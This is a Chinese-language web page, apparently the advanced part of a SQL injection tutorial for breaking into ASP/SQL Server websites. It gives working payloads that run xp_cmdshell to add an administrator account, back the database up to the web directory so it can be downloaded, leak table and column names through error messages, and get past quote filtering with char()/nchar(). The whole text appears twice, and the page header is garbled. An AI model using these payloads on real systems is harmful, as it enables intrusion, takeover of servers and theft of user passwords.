< DOCTYPE html PUBLIC -WCDTD XHTML TransitionalEN httpwwwworgTRxhtmlDTDxhtml-transitionaldtd>
高 级 篇
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。
第一节、利用系统表注入SQLServer 数据库
SQLServer 是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:
① master..xp_cmdshell "net user name password /add"-- 分号; 在SQLServer 中表示隔开前后两句语句,-- 表示后面的语句为注释,所以,这句语句在SQLServer 中将被分成两句执行,先是Select 出ID=1 的记录,然后执行存储过程xp_cmdshell ,这个存储过程用于调用系统命令,于是,用net 命令新建了用户名为name 、密码为password 的windows 的帐号,接着:
② master..xp_cmdshell "net localgroup administrators name /add"-- 将新建的帐号name 加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa 连接数据库的情况,否则,是没有权限调用xp_cmdshell 的。
③ http://Site/url.asp?id=1 and db_name()>0 前面有个类似的例子and user>0 ,作用是获取连接用户名,db_name() 是另一个系统变量,返回的是连接的数据库名。
④ database 数据库名 to disk= ’c:\inetpub\wwwroot\1.db ’;-- 这是相当狠的一招,从③拿到的数据库名,加上某些IIS 出错暴露出的绝对路径,将数据库备份到Web 目录下面,再用HTTP 把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如 ),但成功率不高。
⑤ http://Site/url.asp?id=1 and (Select Top 1 name from sysobjects where xtype=U and status>0)>0 前面说过,sysobjects 是SQLServer 的系统表,存储着所有的表名、视图、约束及其它对象,xtype=U and status>0 ,表示用户建立的表名,上面的语句将第一个表名取出,与0 比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。
⑥ http://Site/url.asp?id=1 and (Select Top 1 col_name(object_id( 表名),1) from sysobjects)>0 从⑤拿到表名后,用object_id( ‘表名’) 获取表名对应的内部ID ,col_name( 表名ID,1) 代表该表的第1 个字段名,将1 换成2,3,4... 就可以逐个获取所猜解表里面的字段名。
以上6 点是我研究SQLServer 注入半年多以来的心血结晶,可以看出,对SQLServer 的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer 注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。 第二节、绕过程序限制继续注入 在入门篇提到,有很多人喜欢用号测试注入漏洞,所以也有很多人用过滤号的方法来“防止”注入漏洞,这也许能挡住一些入门者的攻击,但对SQL 注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。 在“SQL 注入的一般步骤”一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在“利用系统表注入SQLServer 数据库”中,有些语句包含有号,我们举个例子来看看怎么改造这些语句: 简单的如where xtype=U ,字符U 对应的ASCII 码是85 ,所以可以用where xtype=char(85) 代替;如果字符是中文的,比如where name= 用户,可以用where name=nchar(29992)+nchar(25143) 代替。
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。
第一节、利用系统表注入SQLServer 数据库
SQLServer 是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:
① master..xp_cmdshell "net user name password /add"-- 分号; 在SQLServer 中表示隔开前后两句语句,-- 表示后面的语句为注释,所以,这句语句在SQLServer 中将被分成两句执行,先是Select 出ID=1 的记录,然后执行存储过程xp_cmdshell ,这个存储过程用于调用系统命令,于是,用net 命令新建了用户名为name 、密码为password 的windows 的帐号,接着:
② master..xp_cmdshell "net localgroup administrators name /add"-- 将新建的帐号name 加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa 连接数据库的情况,否则,是没有权限调用xp_cmdshell 的。
③ http://Site/url.asp?id=1 and db_name()>0 前面有个类似的例子and user>0 ,作用是获取连接用户名,db_name() 是另一个系统变量,返回的是连接的数据库名。
④ database 数据库名 to disk= ’c:\inetpub\wwwroot\1.db ’;-- 这是相当狠的一招,从③拿到的数据库名,加上某些IIS 出错暴露出的绝对路径,将数据库备份到Web 目录下面,再用HTTP 把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如 ),但成功率不高。
⑤ http://Site/url.asp?id=1 and (Select Top 1 name from sysobjects where xtype=U and status>0)>0 前面说过,sysobjects 是SQLServer 的系统表,存储着所有的表名、视图、约束及其它对象,xtype=U and status>0 ,表示用户建立的表名,上面的语句将第一个表名取出,与0 比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。
⑥ http://Site/url.asp?id=1 and (Select Top 1 col_name(object_id( 表名),1) from sysobjects)>0 从⑤拿到表名后,用object_id( ‘表名’) 获取表名对应的内部ID ,col_name( 表名ID,1) 代表该表的第1 个字段名,将1 换成2,3,4... 就可以逐个获取所猜解表里面的字段名。
以上6 点是我研究SQLServer 注入半年多以来的心血结晶,可以看出,对SQLServer 的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer 注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。 第二节、绕过程序限制继续注入 在入门篇提到,有很多人喜欢用号测试注入漏洞,所以也有很多人用过滤号的方法来“防止”注入漏洞,这也许能挡住一些入门者的攻击,但对SQL 注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。 在“SQL 注入的一般步骤”一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在“利用系统表注入SQLServer 数据库”中,有些语句包含有号,我们举个例子来看看怎么改造这些语句: 简单的如where xtype=U ,字符U 对应的ASCII 码是85 ,所以可以用where xtype=char(85) 代替;如果字符是中文的,比如where name= 用户,可以用where name=nchar(29992)+nchar(25143) 代替。